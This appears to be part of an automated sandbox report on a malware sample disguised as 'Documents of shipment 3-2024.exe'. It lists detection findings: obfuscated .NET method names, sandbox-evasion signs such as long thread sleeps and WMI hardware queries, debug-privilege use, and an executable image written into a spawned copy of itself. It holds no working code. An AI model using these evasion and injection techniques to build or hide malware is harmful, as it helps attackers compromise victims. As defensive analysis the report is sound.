                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, dCmF1Ssthw6NjSeCNU.csHigh entropy of concatenated method names: 'wuje8fgRjf', 'M8xe0m0Rq4', 'DT5ei8K45i', 'JOueMKXdTV', 'oZKeb1BRZk', 'h20e9WQQsq', 'iqdeB9cbtb', 'RsEecqn0GJ', 'mdue622MYu', 'BdHeaEm9SV'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, VSDVbK3tUKZEx3nS90.csHigh entropy of concatenated method names: 'nBW9GJTyr7', 'BKR9mYNHEV', 'Gq49pU7KBU', 'MD29ty2aW5', 'Pr09daVdqJ', 'ooi9XTsLvS', 'O1b9WtTdpG', 'Hos9yGuoaV', 'y8n9JgYaPf', 'i8n9rNFDMq'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, BylFJf2Zhp8SLOP8x1I.csHigh entropy of concatenated method names: 'MAofGHCIZ8', 'fqyfmGsBpO', 'x4qfptxY2q', 'GVKftRrYvL', 'fi0fdnE2Hq', 'Ii6fXNUtBO', 'CEGfWlTvLb', 'rRdfyoPAns', 'LT3fJMvY5C', 'KlcfrADW0I'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, gM2G8n0AHJRGPmLJNN.csHigh entropy of concatenated method names: 'Dispose', 'Tbp2VSQVLP', 'u38I5I2Qcc', 'qNmYYxk13q', 'mAC2UmF1St', 'Uw62zNjSeC', 'ProcessDialogKey', 'QUIIZIvYPF', 'zyII2riUck', 'mokIIfQ7i8'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, LsAxH0IgLQPGa9oup8.csHigh entropy of concatenated method names: 'QSgpuBq8s', 'N0It1JvFI', 'YLFXqZKLO', 'uayWQUmp8', 'GyJJkCFkD', 'sPkr00p24', 'sByXSnf0gWcUhmau8p', 'D67D7Utcg2umaDOtp2', 'xgieN7uPh', 'gktYXVHym'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, bIvYPFVtyIriUck6ok.csHigh entropy of concatenated method names: 'Ua0eKnlxO3', 'o7re57rA7r', 'OBoeSljykt', 'USXeCiYnad', 'SLaeqh1cy2', 'tBEexj65Lw', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, rQ7i8GUFLJVmdv8p2Y.csHigh entropy of concatenated method names: 'yhnf2KlrHa', 'xTBfghTtSe', 'rpsfA98TDs', 'YjEf8mQbvV', 'slyf0O2c1m', 'Kb7fM6wFo3', 'ar9fbvUQUL', 'Adae49GATU', 'BN3es1eH8t', 'OUmeVWHRgb'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, lpyWDZv40r0bWpUTjS.csHigh entropy of concatenated method names: 'ToString', 's1PkHhTaO1', 'O2qk5JBcYw', 'I4hkSk6ZHi', 'UBPkCXmZth', 'akckxPH9Jq', 'Q9Fkud5Xep', 'jJSkoKl03u', 'MVIkT1ZrCZ', 'pRtk3HsJgo'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, XTPGhDA3dIlhb64mav.csHigh entropy of concatenated method names: 'k7N29VE6fv', 'sY62BnuXQ1', 'poZ26wYr1m', 'm0d2a2B3Hp', 'E5O2jT9g3W', 'PxX2koTBRF', 'wfMeKR9Xpo0AND7rgS', 'h4HUGaviZk02U9jVKF', 'Fsh222YUnb', 'mQB2gSbxk9'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, QhXs1iicvmrsW3kO07.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UQjIVXLqqY', 'vUaIUVaJ9Z', 'oL7Iz2k5FG', 'tFYgZohJg8', 'jCvg2cLl60', 'Xl7gIbujGe', 'qQXggF5ybB', 'UpqUDWorkCFlXcm46CV'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, c3WFxXKoTBRFECotHe.csHigh entropy of concatenated method names: 'oq8bnJ3xJI', 'WBXb0cMr4W', 'xPIbMT0Xj5', 'kWyb99kilu', 'CWsbB0G9On', 'tkOMh4lxIa', 'lVfMDhWffe', 'dVOM4wNreg', 'y4mMsf3eLR', 'nNoMVqvNpW'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, L1THh1BjLYfAt0yqQB.csHigh entropy of concatenated method names: 'm8vgnnwCwk', 'QrLg8xsWkL', 'w7cg01PvZL', 'YcggiEp5S6', 'BU7gM800X2', 've3gbAog5e', 'BsSg9CnGOh', 'lrrgBt4Ejt', 'LEggcLNXKu', 'IBMg6Qwjqg'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, QVE6fvyfY6nuXQ1y2a.csHigh entropy of concatenated method names: 'bcN0qkV31Y', 'Bm307QToCk', 'dfZ0vIpE0Y', 'e940Ew7V1B', 'jFM0hFgYMI', 'efS0DabEU8', 'NM404rXAkH', 'JSI0sfCQjs', 'NsE0VbF6qI', 'j4H0UxMEi6'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, RcwQHaEZy6735qurFY.csHigh entropy of concatenated method names: 'P96Q6ZaFsG', 'QZgQatDWSE', 'ToString', 'ukQQ8NnhUm', 'CODQ0tlI8o', 'kaAQiQvCBg', 'icDQMXiLrI', 'VjUQbHHPsF', 'x9JQ963RLi', 'oyVQBAqxqs'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, bwxwKbNIvW51SAID7j.csHigh entropy of concatenated method names: 'qF4Py0fJ41', 'vXtPJpbDqK', 'ARjPKGvtBL', 'MyEP5fffaY', 'BWZPCPboR3', 'RGaPxAaydS', 'Mk7PoLi0hC', 'j9BPTKUrCk', 'cK0PRb2j0M', 'RA8PHmrY6V'
                      Source: 1.2.Documents of shipment 3-2024.exe.6ae0000.5.raw.unpack, FRq2DkJoZwYr1m60d2.csHigh entropy of concatenated method names: 'LuQitvlipS', 'zJkiXX75u4', 't9FiyKOrMK', 'xF7iJD83OR', 'u6RijvPsJ0', 'DEPiklZZiv', 'QsDiQfe4Xr', 'TCmiePeUSv', 'eyrifNvMAU', 'QqfiYicV9C'
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Documents of shipment 3-2024.exe PID: 7472, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 2280000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 22F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 89E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 99E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 9BF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: ABF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 15D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWindow / User API: threadDelayed 1291Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWindow / User API: threadDelayed 2893Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7524Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7764Thread sleep count: 1291 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7764Thread sleep count: 2893 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99153s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -99047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98937s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -98062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -97953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -97844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -97734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99766Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99641Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99391Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99266Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99153Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 99047Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98937Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98828Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98719Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98609Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98500Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98391Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98281Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98172Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 98062Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 97953Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 97844Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 97734Jump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Documents of shipment 3-2024.exe, 00000003.00000002.2486589599.00000000016D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeMemory written: C:\Users\user\Desktop\Documents of shipment 3-2024.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeProcess created: C:\Users\user\Desktop\Documents of shipment 3-2024.exe C:\Users\user\Desktop\Documents of shipment 3-2024.exeJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Users\user\Desktop\Documents of shipment 3-2024.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Users\user\Desktop\Documents of shipment 3-2024.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Documents of shipment 3-2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
